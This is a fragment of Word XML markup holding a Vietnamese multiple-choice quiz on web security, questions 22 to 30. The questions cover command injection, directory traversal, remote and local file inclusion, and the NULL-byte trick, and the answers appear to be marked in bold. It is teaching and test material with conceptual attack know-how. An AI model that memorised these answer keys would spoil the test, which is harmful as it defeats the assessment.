    <w:p w14:paraId="0973C276" w14:textId="77777777" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Câu 22: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khi nào nên sử dụng hàm escapeshellcmd() trong PHP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59187DD3" w14:textId="342A9648" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khi cần thực thi một lệnh hệ thống có chứa đầu vào từ người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A84D44" w14:textId="4249266B" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Khi cần tải một file từ hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C664A38" w14:textId="21BDE9AD" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Khi cần mã hóa nội dung của file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08435535" w14:textId="3EC5CA08" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Khi cần ghi lại thông tin đăng nhập của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7FBEF1" w14:textId="1A289791" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="00786029"/>
    <w:p w14:paraId="166D3EF0" w14:textId="77777777" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 23: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Làm thế nào để tấn công Directory Traversal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068EA633" w14:textId="03D94D6F" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bằng cách sử dụng các chuỗi như "../" để duyệt qua các thư mục ngoài thư mục gốc của ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475CE28B" w14:textId="3421B494" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Bằng cách sử dụng mã hóa dữ liệu đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72B718" w14:textId="46086D91" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Bằng cách tải file từ mạng nội bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D176E67" w14:textId="21882993" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Bằng cách gửi yêu cầu POST thay vì GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12472D60" w14:textId="77777777" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B"/>
    <w:p w14:paraId="211A7CDA" w14:textId="77777777" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 24: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kỹ thuật nào có thể được sử dụng để giảm thiểu khả năng bị tấn công RFI?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD9A29" w14:textId="497CCF3A" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tắt các thiết lập allow_url_fopen và allow_url_include trong PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492039F" w14:textId="6D89E2BA" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Chặn toàn bộ các yêu cầu HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60FBAB" w14:textId="744E3D47" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Sử dụng HTTPS cho toàn bộ các giao dịch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A673BC" w14:textId="0C5285BC" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>Định cấu hình lại tường lửa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F15E238" w14:textId="77777777" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B"/>
    <w:p w14:paraId="3D0E1D63" w14:textId="77777777" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 25: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ký tự nào thường được sử dụng trong tấn công Directory Traversal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C0A8B" w14:textId="049501C5" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E233C1E" w14:textId="1531B138" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A4B24" w14:textId="7530069F" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r w:rsidRPr="006C450B">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t>||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0322AC28" w14:textId="61184644" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B7150" w14:textId="64331B59" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B"/>
    <w:p w14:paraId="33E134D7" w14:textId="4884D759" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000925AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 26: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ghép các khái niệm bảo mật với mô tả của chúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4090D478" w14:textId="3FA5B601" w:rsidR="006C450B" w:rsidRPr="000925AA" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000925AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidRPr="000925AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal → Kẻ tấn công truy cập file ngoài thư mục gốc bằng cách duyệt qua các thư mục, RFI → Kẻ tấn công đưa file từ máy chủ từ xa vào để thực thi mã độc, LFI → Kẻ tấn công truy cập và đọc file hệ thống qua tham số đầu vào, OS Command Injection → Khi kẻ tấn công thực thi lệnh hệ thống qua lỗ hổng đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D60899" w14:textId="57B2464D" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r>
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Kẻ tấn công truy cập file ngoài thư mục gốc bằng cách duyệt qua các thư mục, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Kẻ tấn công đưa file từ máy chủ từ xa vào để thực thi mã độc, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Kẻ tấn công truy cập và đọc file hệ thống qua tham số đầu vào, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Khi kẻ tấn công thực thi lệnh hệ thống qua lỗ hổng đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48351E22" w14:textId="17A6FE60" w:rsidR="006C450B" w:rsidRPr="006C450B" w:rsidRDefault="006C450B" w:rsidP="006C450B">
      <w:r>
        <w:t xml:space="preserve">c. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Kẻ tấn công truy cập file ngoài thư mục gốc bằng cách duyệt qua các thư mục, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Kẻ tấn công đưa file từ máy chủ từ xa vào để thực thi mã độc, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Kẻ </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">tấn công truy cập và đọc file hệ thống qua tham số đầu vào, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="006C450B">
        <w:t xml:space="preserve"> → Khi kẻ tấn công thực thi lệnh hệ thống qua lỗ hổng đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7BC03" w14:textId="66F35283" w:rsidR="006C450B" w:rsidRDefault="006C450B" w:rsidP="00786029"/>
    <w:p w14:paraId="7500F163" w14:textId="77777777" w:rsidR="00870FC5" w:rsidRPr="003B6C77" w:rsidRDefault="00870FC5" w:rsidP="00870FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 27: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗ hổng nào dưới đây thường dẫn đến khả năng thực thi mã từ xa trên hệ thống?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD4B276" w14:textId="666A4C3E" w:rsidR="00870FC5" w:rsidRPr="00870FC5" w:rsidRDefault="00870FC5" w:rsidP="00870FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00870FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A5EFB" w14:textId="58A9E0EC" w:rsidR="00870FC5" w:rsidRPr="00870FC5" w:rsidRDefault="00870FC5" w:rsidP="00870FC5">
      <w:r w:rsidRPr="00870FC5">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00870FC5">
        <w:t>Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CEA9EB" w14:textId="6D162FA4" w:rsidR="00870FC5" w:rsidRPr="00870FC5" w:rsidRDefault="00870FC5" w:rsidP="00870FC5">
      <w:r w:rsidRPr="00870FC5">
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidR="003B6C77">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00870FC5">
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B03FA28" w14:textId="216E131A" w:rsidR="00870FC5" w:rsidRDefault="00870FC5" w:rsidP="00870FC5">
      <w:r w:rsidRPr="00870FC5">
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidR="003B6C77">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00870FC5">
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885E389" w14:textId="77777777" w:rsidR="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="00870FC5"/>
    <w:p w14:paraId="3E2905C6" w14:textId="77777777" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 28: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Để kiểm tra lỗ hổng Command Injection, người kiểm thử có thể sử dụng phương pháp nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C109B" w14:textId="1154A99A" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Truy cập vào cổng mạng khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD60295" w14:textId="79A79F9E" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Trình duyệt ẩn danh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61768346" w14:textId="508DC565" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Cú pháp URL encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0F8EC" w14:textId="041AA20D" w:rsidR="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chuỗi mã độc kèm theo lệnh hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE1127" w14:textId="77777777" w:rsidR="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1B8675" w14:textId="77777777" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 29: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗ hổng Command Injection thường xuất hiện khi nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4FD03" w14:textId="0477D044" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Trình duyệt bị tấn công bởi mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650C348" w14:textId="7EBF3BCD" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Có nhiều người dùng truy cập cùng lúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B40CD94" w14:textId="3006FE6B" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Ứng dụng không có giao diện người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405164DF" w14:textId="1F3E3F67" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã lệnh từ người dùng không được hợp lệ hóa trước khi chạy trên máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3CC82" w14:textId="0D979F13" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77"/>
    <w:p w14:paraId="3DA7B7F2" w14:textId="77777777" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Câu 30: T</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ham số NULL byte (%00) được sử dụng như thế nào trong khai thác file inclusion?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E9D83" w14:textId="00031B5A" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Để bỏ qua phần mở rộng của file và thực thi file đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A224AB" w14:textId="4B2414FE" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Để mã hóa nội dung file trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D6EF2B" w14:textId="179C44BF" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Để xóa một file từ server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DEE1E2" w14:textId="3FDD56F9" w:rsidR="003B6C77" w:rsidRPr="003B6C77" w:rsidRDefault="003B6C77" w:rsidP="003B6C77">
      <w:r w:rsidRPr="003B6C77">
        <w:t>d.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B6C77">
        <w:t>Để tăng quyền truy cập của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7A814E" w14:textId="428C7996" w:rsidR="003529B3" w:rsidRPr="005D28D4" w:rsidRDefault="003529B3" w:rsidP="005D28D4"/>
    <w:p w14:paraId="6E1B2821" w14:textId="68F372E3" w:rsidR="005D28D4" w:rsidRPr="00DA21E1" w:rsidRDefault="005D28D4" w:rsidP="00DA21E1"/>
    <w:p w14:paraId="092BED22" w14:textId="1E166131" w:rsidR="00DA21E1" w:rsidRDefault="00DA21E1" w:rsidP="00DA21E1"/>
    <w:sectPr w:rsidR="00DA21E1" w:rsidSect="00281D74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89"/>
    <w:rsid w:val="000925AA"/>
    <w:rsid w:val="000F0123"/>
    <w:rsid w:val="001D09CA"/>
    <w:rsid w:val="0021326E"/>
    <w:rsid w:val="00281D74"/>
    <w:rsid w:val="00284649"/>
